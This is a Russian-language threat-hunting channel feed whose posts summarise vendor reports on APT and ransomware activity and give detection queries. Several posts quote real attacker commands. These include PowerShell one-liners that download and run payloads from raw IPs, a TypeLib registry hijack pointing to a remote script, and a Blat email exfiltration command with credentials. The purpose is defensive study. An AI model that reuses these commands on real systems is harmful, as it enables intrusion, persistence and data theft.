Know Your Adversary
04.05.202511:29
Всем привет!
Продолжаю пополнять свою коллекцию PowerShell! Сегодня утром я читал вот этот отчет и заметил ещё один реальный пример злоупотребления PowerShell для подмены временных меток (timestomping).
Злоумышленник создавал запланированные задачи для запуска MeshAgent, а затем выполнял команды PowerShell для изменения временных меток связанных файлов. Вот примеры:
Например, мы можем использовать события ScriptBlock для охоты на злоупотребление командлетом
Удачной охоты!
Увидимся завтра!
English version
Продолжаю пополнять свою коллекцию PowerShell! Сегодня утром я читал вот этот отчет и заметил ещё один реальный пример злоупотребления PowerShell для подмены временных меток (timestomping).
Злоумышленник создавал запланированные задачи для запуска MeshAgent, а затем выполнял команды PowerShell для изменения временных меток связанных файлов. Вот примеры:
(Get-Item “.\vcruntime140_1.dll”).LastAccessTime=(“12 May 2024 11:14:00”) `Например, мы можем использовать события ScriptBlock для охоты на злоупотребление командлетом
Get-Item:event_type: "ScriptExecutionWin"
AND
script_text: "get-item" AND ("lastaccesstime" OR "lastwritetime" OR "creationtime")
Удачной охоты!
Увидимся завтра!
English version
30.04.202515:40
Всем привет!
Мы всё чаще видим использование инструментов для туннелирования. Настолько часто, что такие утилиты, как ngrok и chisel, сегодня зачастую мгновенно обнаруживаются и блокируются (правда ведь?). Что это значит? Злоумышленники всегда ищут альтернативы!
И одной из таких альтернатив является iox — это инструмент с открытым исходным кодом для проброса портов и проксирования внутри сети. Например, его использовала группа, стоящая за вымогателем Ghost.
Этот инструмент часто применяется для проброса портов RDP и SSH, это мы и можем использовать для поиска:
Больше информации об инструменте можно найти здесь.
Увидимся завтра!
Мы всё чаще видим использование инструментов для туннелирования. Настолько часто, что такие утилиты, как ngrok и chisel, сегодня зачастую мгновенно обнаруживаются и блокируются (правда ведь?). Что это значит? Злоумышленники всегда ищут альтернативы!
И одной из таких альтернатив является iox — это инструмент с открытым исходным кодом для проброса портов и проксирования внутри сети. Например, его использовала группа, стоящая за вымогателем Ghost.
Этот инструмент часто применяется для проброса портов RDP и SSH, это мы и можем использовать для поиска:
event_type: "processcreate"
AND
cmdline: "fwd" AND ("22" OR "3389")
Больше информации об инструменте можно найти здесь.
Увидимся завтра!
21.04.202507:02
Всем привет!
Давайте поговорим о не самых распространённых методах закрепления. Согласно отчёту компании ReliaQuest, Black Basta начали использовать новый метод закрепления, основанный на перехвате Component Object Model Type Library.
При перехвате TypeLib злоумышленники изменяют записи в реестре, чтобы перенаправить легитимные COM-объекты на вредоносные скрипты или файлы.
Злоумышленники выполнили следующую команду:
Например, мы можем искать злоупотребление reg.exe с помощью запроса:
Также можно отслеживать события изменения реестра:
Увидимся завтра!
English version
Давайте поговорим о не самых распространённых методах закрепления. Согласно отчёту компании ReliaQuest, Black Basta начали использовать новый метод закрепления, основанный на перехвате Component Object Model Type Library.
При перехвате TypeLib злоумышленники изменяют записи в реестре, чтобы перенаправить легитимные COM-объекты на вредоносные скрипты или файлы.
Злоумышленники выполнили следующую команду:
reg add "HKEY_CURRENT_USER\Software\Classes\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64" /t REG_SZ /d "script:hxxps://drive.google[dot]com/uc?export=download^&id=1l5cMkpY9HIERae03tqqvEzCVASQKen63" /fНапример, мы можем искать злоупотребление reg.exe с помощью запроса:
event_type: "processcreatewin"
AND
proc_file_name: "reg.exe"
AND
cmdline: ("TypeLib" И "script")
Также можно отслеживать события изменения реестра:
event_type: "registryvaluesetwin"
AND
reg_key_path: "TypeLib"
AND
reg_value_data: "script"
Увидимся завтра!
English version
10.04.202515:02
Всем привет!
Sapphire Werewolf обновил Amethyst Stealer и теперь использует Canarytokens для сбора информации о скомпрометированных системах.
Хотя Canarytokens обычно применяются для обнаружения вредоносной активности, злоумышленники могут использовать их, чтобы получать уведомления о новых жертвах!
Злоумышленник использовал следующую ссылку для сбора информации о заражённой системе — включая её IP-адрес и информацию о том, является ли она виртуальной машиной:
Разумеется, мы можем охотиться за подозрительными DNS-запросами:
Больше информации о тактиках, техниках и процедурах Sapphire Werewolf можно найти в соответствующем отчёте.
Увидимся завтра!
English version
Sapphire Werewolf обновил Amethyst Stealer и теперь использует Canarytokens для сбора информации о скомпрометированных системах.
Хотя Canarytokens обычно применяются для обнаружения вредоносной активности, злоумышленники могут использовать их, чтобы получать уведомления о новых жертвах!
Злоумышленник использовал следующую ссылку для сбора информации о заражённой системе — включая её IP-адрес и информацию о том, является ли она виртуальной машиной:
hxxp://canarytokens[.]com/traffic/tags/static/xjemqlqirwqru9pkrh3j4ztmf/payments.js
Разумеется, мы можем охотиться за подозрительными DNS-запросами:
event_type: "dnsreq"
AND
dns_rname: "canarytokens.com"
Больше информации о тактиках, техниках и процедурах Sapphire Werewolf можно найти в соответствующем отчёте.
Увидимся завтра!
English version
07.04.202512:41
Всем привет! Если хотите больше узнать о применении киберразведданных - это статья для вас! А если захотите задать вопросы - присоединяйтесь к завтрашнему вебинару!
01.04.202508:36
Всем привет!
Сегодня мы рассмотрим еще один любопытный пример злоупотребления PowerShell — на этот раз от Head Mare (мы отслеживаем эту активность как Rainbow Hyena).
Злоумышленник распространял защищенные паролем архивы с вредоносными LNK-файлами. LNK-файл выполняет следующую команду PowerShell для запуска бэкдора PhantomPyramid на скомпрометированной системе:
Думаю, вы уже заметили интересные строки, которые можно использовать для обнаружения: "
Если вы хотите узнать больше об этой кампании, вот отчет команды Kaspersky.
Увидимся завтра!
English version
Сегодня мы рассмотрим еще один любопытный пример злоупотребления PowerShell — на этот раз от Head Mare (мы отслеживаем эту активность как Rainbow Hyena).
Злоумышленник распространял защищенные паролем архивы с вредоносными LNK-файлами. LNK-файл выполняет следующую команду PowerShell для запуска бэкдора PhantomPyramid на скомпрометированной системе:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "$r=$(Get-Location).Path + '\\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip';if(Test-Path $r) { cmd.exe /c start /B $r; } else { $f=$(Get-ChildItem -Path 'C:\Users\<user>' -Recurse -Filter '\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip' | Select-Object -First 1); if($f) { $r=$f.FullName; cmd.exe /c start /B $f.FullName; }; };if(-Not (Test-Path $r)) { $r=$(Get-ChildItem -Path 'C:\Users\<user>\AppData\Local\Temp' -Recurse -Filter "\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip" | Select-Object -First 1).FullName; }; [System.IO.File]::WriteAllBytes([System.IO.Path]::Combine('C:\Users\<user>\AppData\Local\Temp', '\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.pdf'), ([System.IO.File]::ReadAllBytes($r) | Select-Object -Skip 7166158 -First 147100)); Start-Process -FilePath $([System.IO.Path]::Combine('C:\Users\<user>\AppData\Local\Temp', '\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.pdf'));Думаю, вы уже заметили интересные строки, которые можно использовать для обнаружения: "
WriteAllBytes", "Combine", "ReadAllBytes". Давайте сформируем логику для детектирования:event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("WriteAllBytes" AND "Combine" AND "ReadAllBytes")
Если вы хотите узнать больше об этой кампании, вот отчет команды Kaspersky.
Увидимся завтра!
English version
03.05.202512:39
Всем привет!
Insikt Group раскрыла два новых семейства вредоносных программ: TerraStealerV2 и TerraLogger. Оба были приписаны злоумышленнику, известному как Golden Chickens. Этот злоумышленник предоставляет инструменты другим преступникам, работая по модели Malware-as-a-Service (MaaS).
Я ознакомился с отчетом и (как всегда) нашел несколько возможностей для обнаружения.
Например, злоумышленник использовал
Мы можем искать подобную активность с помощью следующего запроса:
Еще один пример, злоумышленник использует
Мы можем использовать следующий запрос для поиска выполнения OCX-файлов из папок
Еще пример: стилер использует
Обязательно ознакомьтесь с отчетом — в нем полно идей для разработки детектирующей логики!
Увидимся завтра!
English version
Insikt Group раскрыла два новых семейства вредоносных программ: TerraStealerV2 и TerraLogger. Оба были приписаны злоумышленнику, известному как Golden Chickens. Этот злоумышленник предоставляет инструменты другим преступникам, работая по модели Malware-as-a-Service (MaaS).
Я ознакомился с отчетом и (как всегда) нашел несколько возможностей для обнаружения.
Например, злоумышленник использовал
ssh.exe для проксирования выполнения PowerShell:ssh.exe -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"Мы можем искать подобную активность с помощью следующего запроса:
event_type: "processcreatewin"
AND
proc_file_name: "ssh.exe"
AND
cmdline: "proxycommand"
Еще один пример, злоумышленник использует
regsvr32.exe для выполнения вредоносного OCX-файла:regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocxМы можем использовать следующий запрос для поиска выполнения OCX-файлов из папок
Temp:event_type: "processcreatewin"
AND
proc_file_name: "regsvr32.exe"
AND
cmdline: "temp" AND "ocx"
Еще пример: стилер использует
ifconfig[.]me для сбора информации о IP-адресе скомпрометированной системы, мы также можем использовать это для проактивного поиска:event_type: "dnsreq"
AND
dns_rname: "ifconfig.me"
Обязательно ознакомьтесь с отчетом — в нем полно идей для разработки детектирующей логики!
Увидимся завтра!
English version
28.04.202518:36
Всем привет!
Пора снова поговорить о средствах уклонения от защиты, замеченных в атаках программ-вымогателей! На этот раз мы рассмотрим инструментарий группировки Qilin.
Инструмент, на который мы обратим внимание, называется YDArk. Это мощный инструмент для манипуляций с ядром системы, который появился на китайских теневых форумах ещё в 2020 году. Разумеется, злоумышленники используют его для завершения процессов, связанных с антивирусами и решениями EDR.
Как обычно, мы можем использовать оригинальное имя файла для обнаружения:
Также можно сфокусироваться на драйвере, который он использует:
Кроме того, он создаёт службу — это ещё одна возможность для обнаружения!
Увидимся завтра!
English version
Пора снова поговорить о средствах уклонения от защиты, замеченных в атаках программ-вымогателей! На этот раз мы рассмотрим инструментарий группировки Qilin.
Инструмент, на который мы обратим внимание, называется YDArk. Это мощный инструмент для манипуляций с ядром системы, который появился на китайских теневых форумах ещё в 2020 году. Разумеется, злоумышленники используют его для завершения процессов, связанных с антивирусами и решениями EDR.
Как обычно, мы можем использовать оригинальное имя файла для обнаружения:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "YDArk.exe"
Также можно сфокусироваться на драйвере, который он использует:
event_type: "driverloadwin"
AND
file_name: "YDArkDrv.sys"
Кроме того, он создаёт службу — это ещё одна возможность для обнаружения!
Увидимся завтра!
English version
20.04.202519:15
Всем привет!
Уверен, что все уже слышали о CVE-2025-24054, уязвимости, связанной с раскрытием хеша NTLM через спуфинг.
Check Point опубликовала отчёт с обзором того, как эта уязвимость используется в реальных атаках. Эксплуатация уязвимости происходит с минимальным взаимодействием со стороны пользователя — например, при выборе, просмотре или выполнении любого действия с файлом, кроме его открытия или запуска.
Злоумышленники используют вредоносные файлы с расширением
Увидимся завтра!
English version
Уверен, что все уже слышали о CVE-2025-24054, уязвимости, связанной с раскрытием хеша NTLM через спуфинг.
Check Point опубликовала отчёт с обзором того, как эта уязвимость используется в реальных атаках. Эксплуатация уязвимости происходит с минимальным взаимодействием со стороны пользователя — например, при выборе, просмотре или выполнении любого действия с файлом, кроме его открытия или запуска.
Злоумышленники используют вредоносные файлы с расширением
.library-ms, которые распространяются через фишинговые письма. Файлы с таким расширением встречаются довольно редко, поэтому мы можем отследить их появление по событиям создания файлов:event_type: "filecreate"
AND
file_path: "library-ms"
Увидимся завтра!
English version
09.04.202518:49
Всем привет!
Думаю, вы уже слышали об уязвимости нулевого дня в Common Log File System (CLFS), которая эксплуатировалась RansomEXX. Речь идет о CVE-2025-29824.
Если заглянуть в отчет Microsoft Threat Intelligence Center (MSTIC), можно заметить любопытный артефакт. В рамках эксплуатации создается CLFS BLF-файл:
Что это значит? Мы можем использовать это поведение для проактивного поиска подобной активности! Например:
Несмотря на то, что злоумышленник использовал уязвимость нулевого дня для повышения привилегий, в цепочке атаки были и легко обнаруживаемые действия — например, злоупотребление ProcDump для дампа LSASS.
Как всегда — даже в сложных случаях у нас есть масса возможностей для детектирования!
Увидимся завтра!
English version
Думаю, вы уже слышали об уязвимости нулевого дня в Common Log File System (CLFS), которая эксплуатировалась RansomEXX. Речь идет о CVE-2025-29824.
Если заглянуть в отчет Microsoft Threat Intelligence Center (MSTIC), можно заметить любопытный артефакт. В рамках эксплуатации создается CLFS BLF-файл:
C:\ProgramData\SkyPDF\PDUDrv.blf.Что это значит? Мы можем использовать это поведение для проактивного поиска подобной активности! Например:
event_type: "filecreatewin"
AND
file_path: ("programdata" AND "blf")
Несмотря на то, что злоумышленник использовал уязвимость нулевого дня для повышения привилегий, в цепочке атаки были и легко обнаруживаемые действия — например, злоупотребление ProcDump для дампа LSASS.
Как всегда — даже в сложных случаях у нас есть масса возможностей для детектирования!
Увидимся завтра!
English version
转发自:
BI.ZONE
07.04.202512:41
🌛 Как угрозоцентричный подход позволяет избежать ущерба от кибератак
В новой статье рассказали о подходе к кибербезопасности, который позволит сосредоточиться на самых актуальных угрозах.
Из нее вы узнаете:
🟦что это за подход,
🟦в чем его преимущества,
🟦как предотвращать реальные атаки, используя киберразведданные.
Читать статью
А чтобы закрепить материал, подключайтесь к бесплатному вебинару. На нем обсудим, как получить максимум от данных киберразведки и какие инструменты BI.ZONE Threat Intelligence помогут в проактивном поиске угроз для вашей организации.
➡️Зарегистрироваться
В новой статье рассказали о подходе к кибербезопасности, который позволит сосредоточиться на самых актуальных угрозах.
Из нее вы узнаете:
🟦что это за подход,
🟦в чем его преимущества,
🟦как предотвращать реальные атаки, используя киберразведданные.
Читать статью
А чтобы закрепить материал, подключайтесь к бесплатному вебинару. На нем обсудим, как получить максимум от данных киберразведки и какие инструменты BI.ZONE Threat Intelligence помогут в проактивном поиске угроз для вашей организации.
➡️Зарегистрироваться
31.03.202504:54
Всем привет!
Мы уже давно не обсуждали злоупотребление PowerShell, но, думаю, пора продолжить. И нам в этом поможет Gamaredon!
Группа продолжает распространять вредоносные LNK-файлы, содержащие PowerShell-код для загрузки и выполнения полезной нагрузки, а также открытия отвлекающего документа. Например:
Как видите, здесь есть несколько интересных параметров командной строки, которые можно использовать для детектирования и поиска угроз.
Я выбрал следующие параметры для обнаружения: "
Более того, аналогичный метод можно использовать для поиска похожих файлов, например, на VirusTotal.
Удачной охоты и увидимся завтра!
Мы уже давно не обсуждали злоупотребление PowerShell, но, думаю, пора продолжить. И нам в этом поможет Gamaredon!
Группа продолжает распространять вредоносные LNK-файлы, содержащие PowerShell-код для загрузки и выполнения полезной нагрузки, а также открытия отвлекающего документа. Например:
powershell.exe -WindowStyle hidden echo DsuXBGtDPVpafNQKWfGNQXRPehfejEMnZWqvtPFEKrDQRtLDoRtJCcMjEFenVKrryMHia; Write-HostZVRjgZrFwKSbjNrBtIujdNLLlPq; if (-not(Test-Path iscabv.''zi''p -PathType Leaf)){echo vgUYzpRfaoGxgCSuzlmZCRxmXRnGJKBwooBEEoJgvYqjRXoXTHaspGDtNMuMovanuZezIbSYgAmXMqDOLMczhxmvJtkBJPsVai; &(g''cm i******w*****r) -uri h''t''tp:''//''146''.''1''85''.''233''.''90''/iscabv.''zi''p -OutFile iscabv.''zi''p}; Expand-Archive -Path iscabv.''zi''p -DestinationPath Drvx64; star''t Drvx64/IsCabView.''e''xe; echo ihdfDvzZhaId; &(g''c''m *******ke-****est) -uri h''t''tp:''//''146''.''1''85''.''233''.''90''/oudid/Nak0579.doc -OutFile Nak0579.doc; sta''rt Nak0579.docКак видите, здесь есть несколько интересных параметров командной строки, которые можно использовать для детектирования и поиска угроз.
Я выбрал следующие параметры для обнаружения: "
WindowStyle hidden echo" и "Expand-Archive":event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("WindowStyle hidden echo" AND "Expand-Archive")
Более того, аналогичный метод можно использовать для поиска похожих файлов, например, на VirusTotal.
Удачной охоты и увидимся завтра!
02.05.202508:14
Всем привет!
Мы уже несколько раз говорили о том, как злоумышленники используют PowerPoint для доставки вредоносного ПО. Пора обсудить это снова!
Seqrite опубликовала отчет о деятельности APT36 (мы отслеживаем этот кластер под названием Translucent Werewolf). Согласно исследованию, злоумышленники использовали файлы надстроек PowerPoint (PPAM) для доставки Crimson RAT.
По моим наблюдениям, такие файлы довольно редки в современных инфраструктурах, поэтому мы можем искать события открытия PPAM-файлов:
Увидимся завтра!
English version
Мы уже несколько раз говорили о том, как злоумышленники используют PowerPoint для доставки вредоносного ПО. Пора обсудить это снова!
Seqrite опубликовала отчет о деятельности APT36 (мы отслеживаем этот кластер под названием Translucent Werewolf). Согласно исследованию, злоумышленники использовали файлы надстроек PowerPoint (PPAM) для доставки Crimson RAT.
По моим наблюдениям, такие файлы довольно редки в современных инфраструктурах, поэтому мы можем искать события открытия PPAM-файлов:
event_type: "processcreatewin"
AND
proc_file_name: "powerpnt.exe"
AND
cmdline: "ppam"
Увидимся завтра!
English version
23.04.202515:46
Всем привет!
Злоумышленники продолжают использовать легитимные исполняемые файлы для DLL Side-Loading. На этот раз они злоупотребили программами от Trend Micro и Bitdefender.
Согласно отчёту компании Symantec, шпионская группа Billbug использовала исполняемый файл от Trend Micro с именем
Мы можем охотиться за подозрительной активностью этих исполняемых файлов, ориентируясь на подозрительные имена и расположения:
Увидимся завтра!
Злоумышленники продолжают использовать легитимные исполняемые файлы для DLL Side-Loading. На этот раз они злоупотребили программами от Trend Micro и Bitdefender.
Согласно отчёту компании Symantec, шпионская группа Billbug использовала исполняемый файл от Trend Micro с именем
tmdbglog.exe для сайдлоадинга вредоносной библиотеки tmdglog.dll, а также файл bds.exe от Bitdefender для сайдлоадинга DLL с именем log.dll.Мы можем охотиться за подозрительной активностью этих исполняемых файлов, ориентируясь на подозрительные имена и расположения:
event_type: "processcreatewin"
AND
proc_file_originalfilename: ("PtWatchDog.exe" OR "BDSubWiz.exe")
Увидимся завтра!
19.04.202515:17
Всем привет!
Давайте рассмотрим ещё один инструмент, который используют вымогатели для отключения решений AV/EDR. Я говорю о ZammOcide.
Это ещё один пример эксплуатации уязвимого драйвера, на этот раз драйвера Zemana Anti-Malware (zam64.sys). Разумеется, мы можем использовать это для обнаружения:
Инструмент также создает сервис с именем "
Конечно, этот инструмент используется в реальных атаках! Например, группой вымогателей CrazyHunter.
Увидимся завтра!
English version
Давайте рассмотрим ещё один инструмент, который используют вымогатели для отключения решений AV/EDR. Я говорю о ZammOcide.
Это ещё один пример эксплуатации уязвимого драйвера, на этот раз драйвера Zemana Anti-Malware (zam64.sys). Разумеется, мы можем использовать это для обнаружения:
event_type: "driverloadwin"
AND
file_name: "zam64.sys"
Инструмент также создает сервис с именем "
ZammOcide". Это мы тоже можем использовать для обнаружения:event_type: "serviceinstallwin"
AND
service_name: "ZammOcide"
Конечно, этот инструмент используется в реальных атаках! Например, группой вымогателей CrazyHunter.
Увидимся завтра!
English version
08.04.202515:22
Всем привет!
Сегодня я решил поделиться информацией об одном интересном инструменте для эксфильтрации данных, который используется группировкой Rare Werewolf. Он называется Blat.
Этот инструмент используется этой группировкой уже довольно давно. Вот пример:
Как видите, злоумышленник использует этот инструмент для эксфильтрации собранных данных мессенджера Telegram. То есть да, Blat — это просто небольшая легитимная утилита, которая позволяет злоумышленникам отправлять собранные данные по электронной почте!
Мы можем отслеживать такую активность, сосредоточив внимание на учетных данных и вложениях:
Кстати, у этого образца есть и другие интересные поведенческие особенности — взгляните!
Увидимся завтра!
Сегодня я решил поделиться информацией об одном интересном инструменте для эксфильтрации данных, который используется группировкой Rare Werewolf. Он называется Blat.
Этот инструмент используется этой группировкой уже довольно давно. Вот пример:
blat.exe -to in@vniir.nl -f "TELEGRAM<sent1@vniir.nl>" -server mail.vniir.nl -port 587 -u sent1@vniir.nl -pw fuFhDK3anVteQCvfVQWk -subject "Telegram 927537/user" -body "Telegram 927537/user" -attach "C:\Users\user\Window\tdata.rar"Как видите, злоумышленник использует этот инструмент для эксфильтрации собранных данных мессенджера Telegram. То есть да, Blat — это просто небольшая легитимная утилита, которая позволяет злоумышленникам отправлять собранные данные по электронной почте!
Мы можем отслеживать такую активность, сосредоточив внимание на учетных данных и вложениях:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "blat.exe"
AND
cmdline: ("u" AND "pw" AND "attach")
Кстати, у этого образца есть и другие интересные поведенческие особенности — взгляните!
Увидимся завтра!
06.04.202508:51
Всем привет!
Давайте снова поговорим о Mustang Panda (мы отслеживаем этот кластер под именем Horned Werewolf, если помните).
Этот противник обожает использовать DLL Side-Loading и постоянно находит новые уязвимые исполняемые файлы. Например, в этот раз кластер использовал Canon IJ Printer Assistant Tool.
Можно ли мы отследить такую активность? Конечно!
Начнём с запуска Canon IJ Printer Assistant Tool (cnmpaui.exe) из нетипичных директорий:
Ещё один показательный признак — запуск winword.exe из cnmpaui.exe для показа отвлекающего документа:
Как всегда, вы можете найти ещё больше возможностей для обнаружения, если захотите!
Удачной охоты и увидимся завтра!
English version
Давайте снова поговорим о Mustang Panda (мы отслеживаем этот кластер под именем Horned Werewolf, если помните).
Этот противник обожает использовать DLL Side-Loading и постоянно находит новые уязвимые исполняемые файлы. Например, в этот раз кластер использовал Canon IJ Printer Assistant Tool.
Можно ли мы отследить такую активность? Конечно!
Начнём с запуска Canon IJ Printer Assistant Tool (cnmpaui.exe) из нетипичных директорий:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "cnmpaui.exe"
AND NOT
proc_file_path: "Canon\\Canon IJ Printer Assistant Tool"
Ещё один показательный признак — запуск winword.exe из cnmpaui.exe для показа отвлекающего документа:
event_type: "processcreatewin"
AND
proc_p_file_path: "cnmpaui.exe"
AND
proc_file_path: "winword.exe"
Как всегда, вы можете найти ещё больше возможностей для обнаружения, если захотите!
Удачной охоты и увидимся завтра!
English version
30.03.202511:37
Всем привет!
Думаю, ни для кого не секрет, что банды вымогателей часто злоупотребляют различными инструментами удаленного мониторинга и управления (RMM). Некоторые из них хорошо известны, другие же встречаются реже.
Недавно я заметил еще один RMM, который редко фигурирует в инцидентах, связанных с программами-вымогателями, – он называется NinjaRMM. Например, этот инструмент использовали злоумышленники, распространяющие Medusa.
Как всегда, начнем с обнаружения связанных сетевых запросов:
Следующий шаг – поиск распространенных имен файлов, связанных с компонентами RMM:
Наконец, можно искать переименованные бинарные файлы, используя название продукта:
Увидимся завтра!
Думаю, ни для кого не секрет, что банды вымогателей часто злоупотребляют различными инструментами удаленного мониторинга и управления (RMM). Некоторые из них хорошо известны, другие же встречаются реже.
Недавно я заметил еще один RMM, который редко фигурирует в инцидентах, связанных с программами-вымогателями, – он называется NinjaRMM. Например, этот инструмент использовали злоумышленники, распространяющие Medusa.
Как всегда, начнем с обнаружения связанных сетевых запросов:
event_type: "dnsreq"
AND
dns_rname: "ninjarmm.com"
Следующий шаг – поиск распространенных имен файлов, связанных с компонентами RMM:
event_type: "processcreatewin"
AND
proc_file_name: ("NinjaRMMAgent.exe" OR "NinjaRMMAgenPatcher.exe" OR "ninjarmm-cli.exe")
Наконец, можно искать переименованные бинарные файлы, используя название продукта:
event_type: "processcreatewin"
AND
proc_file_productname: "NinjaRMM"
Увидимся завтра!
01.05.202512:40
Всем привет!
Читая отчет Trend Micro об Earth Kasha, я заметил любопытный поведенческий маркер ROAMINGMOUSE: он использует WMI для запуска
Это означает, что мы можем искать подозрительные запуски
Что касается
Увидимся завтра!
English version
Читая отчет Trend Micro об Earth Kasha, я заметил любопытный поведенческий маркер ROAMINGMOUSE: он использует WMI для запуска
JSLNTOOL.EXE через explorer.exe. JSLNTOOL.EXE — это легитимное приложение, которое злоумышленник использует для сайдлоадинга JSFC.dll — вредоносного загрузчика.Это означает, что мы можем искать подозрительные запуски
explorer.exe через wmiprvse.exe с помощью следующего запроса:event_type: "processcreatewin"
AND
proc_file_path: "explorer.exe"
AND
proc_p_file_path: "wmiprvse.exe"
Что касается
JSLNTOOL.EXE, можно также искать связанные события запуска, обращая внимание на нетипичные расположения:event_type: "processcreatewin"
AND
proc_file_originalfilename: "jslntool.exe"
AND NOT
proc_file_path: "justsystems"
Увидимся завтра!
English version
22.04.202515:02
Всем привет!
Мы уже несколько раз говорили о ClickFix. Но интересно наблюдать, как по-разному используется эта техника.
Согласно отчёту Proofpoint, несколько прогосударственных групп начали применять эту технику. Например, TA427 (мы отслеживаем этот кластер активности под именем Monolithic Werewolf). Злоумышленник маскировал вредоносную PowerShell-команду под регистрационный код:
Как видно, команда включает в себя типичные для вредоносных скриптов командлеты PowerShell, такие как
А вы наблюдали другие интересные способы применения ClickFix?
Увидимся завтра!
English version
Мы уже несколько раз говорили о ClickFix. Но интересно наблюдать, как по-разному используется эта техника.
Согласно отчёту Proofpoint, несколько прогосударственных групп начали применять эту технику. Например, TA427 (мы отслеживаем этот кластер активности под именем Monolithic Werewolf). Злоумышленник маскировал вредоносную PowerShell-команду под регистрационный код:
powershell -windowstyle hidden -Command iwr Как видно, команда включает в себя типичные для вредоносных скриптов командлеты PowerShell, такие как
iwr и iex. Разумеется, мы можем использовать это для проактивного поиска (или даже детектирования!):event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("iwr" AND "iex")
А вы наблюдали другие интересные способы применения ClickFix?
Увидимся завтра!
English version
18.04.202508:54
Всем привет!
Сегодня мы поговорим о ещё одном интересном сервисе, который злоумышленники используют для связи с серверами управления и контроля (C&C).
Согласно этому отчёту команды Kaspersky, IronHusky использовал легитимный сервер
Что это означает? Мы можем отслеживать обращения к этому домену с помощью следующего запроса:
Злоумышленник использовал упомянутую выше вредоносную программу для загрузки MysterySnail RAT.
Увидимся завтра!
Сегодня мы поговорим о ещё одном интересном сервисе, который злоумышленники используют для связи с серверами управления и контроля (C&C).
Согласно этому отчёту команды Kaspersky, IronHusky использовал легитимный сервер
https://ppng[.]io, основанный на проекте piping-server, для запроса команд и отправки результатов их выполнения.Что это означает? Мы можем отслеживать обращения к этому домену с помощью следующего запроса:
event_type: "dnsreq"
AND
dns_rname: "ppng.io"
Злоумышленник использовал упомянутую выше вредоносную программу для загрузки MysterySnail RAT.
Увидимся завтра!
07.04.202514:44
Всем привет!
Уверен, что техника ClickFix уже всем поднадоела, но позвольте показать ещё один интересный вариант, на который я недавно наткнулся.
Речь снова идёт об использовании PowerShell в злонамеренных целях. На этот раз атакующие применили его для генерации ссылки на загрузку:
Как видно, команда получает количество секунд с начала Unix эпохи (1 января 1970), использует это значение для формирования URL, загружает полезную нагрузку и выполняет её в памяти.
Конечно, такую активность можно легко обнаружить, например, используя следующую логику:
А вы встречали другие интересные скрипты в кампаниях ClickFix?
Увидимся завтра!
English version
Уверен, что техника ClickFix уже всем поднадоела, но позвольте показать ещё один интересный вариант, на который я недавно наткнулся.
Речь снова идёт об использовании PowerShell в злонамеренных целях. На этот раз атакующие применили его для генерации ссылки на загрузку:
powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 168.119.173[.]205:8080/$u|iex"Как видно, команда получает количество секунд с начала Unix эпохи (1 января 1970), использует это значение для формирования URL, загружает полезную нагрузку и выполняет её в памяти.
Конечно, такую активность можно легко обнаружить, например, используя следующую логику:
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("datetime" AND "UtcNow" AND "1970" AND "iex")
А вы встречали другие интересные скрипты в кампаниях ClickFix?
Увидимся завтра!
English version
02.04.202513:53
Всем привет!
Давайте еще раз поговорим о технике Dead Drop Resolver (DDR). Команда Cyble представила отчет о FogDoor. Этот бэкдор получает команды из профиля в социальной сети, взаимодействуя с
Это значит, что мы можем отслеживать коммуникации с этим доменом:
Но это еще не все! Злоумышленник также использовал временное хранилище вебхуков,
Как всегда, больше возможностей для обнаружения можно найти в отчете.
Увидимся завтра!
English version
Давайте еще раз поговорим о технике Dead Drop Resolver (DDR). Команда Cyble представила отчет о FogDoor. Этот бэкдор получает команды из профиля в социальной сети, взаимодействуя с
bark[.]lgbt/api.Это значит, что мы можем отслеживать коммуникации с этим доменом:
event_type: "dnsreq"
AND
dns_rname: "bark.lgbt"
Но это еще не все! Злоумышленник также использовал временное хранилище вебхуков,
webhookbin[.]net, для сбора вывода выполненных команд. Мы можем искать аналогичную активность, используя ту же логику:event_type: "dnsreq"
AND
dns_rname: "webhookbin.net"
Как всегда, больше возможностей для обнаружения можно найти в отчете.
Увидимся завтра!
English version
29.03.202515:46
Всем привет!
Злоумышленники всегда нуждаются в выполнении команд через различные интерпретаторы команд и сценариев. Это хорошо известное поведение, поэтому они постоянно ищут техники обхода защитных механизмов.
Trend Micro выпустила отчет о Water Gamayun и отметила интересную технику, используемую злоумышленниками для прокси-выполнения. Атакующие злоупотребляли переименованной версией IntelliJ Command Line Runner (runnerw.exe) для выполнения PowerShell.
Разумеется, мы можем выявить похожее поведение, отлавливая запуски переименованных исполняемых файлов:
Как всегда, в отчете можно найти еще больше возможностей для обнаружения!
Увидимся завтра!
English version
Злоумышленники всегда нуждаются в выполнении команд через различные интерпретаторы команд и сценариев. Это хорошо известное поведение, поэтому они постоянно ищут техники обхода защитных механизмов.
Trend Micro выпустила отчет о Water Gamayun и отметила интересную технику, используемую злоумышленниками для прокси-выполнения. Атакующие злоупотребляли переименованной версией IntelliJ Command Line Runner (runnerw.exe) для выполнения PowerShell.
Разумеется, мы можем выявить похожее поведение, отлавливая запуски переименованных исполняемых файлов:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "runnerw.exe"
AND NOT
proc_file_name: ("runnerw.exe" OR "runnerw64.exe")
Как всегда, в отчете можно найти еще больше возможностей для обнаружения!
Увидимся завтра!
English version
显示 1 - 24 共 37
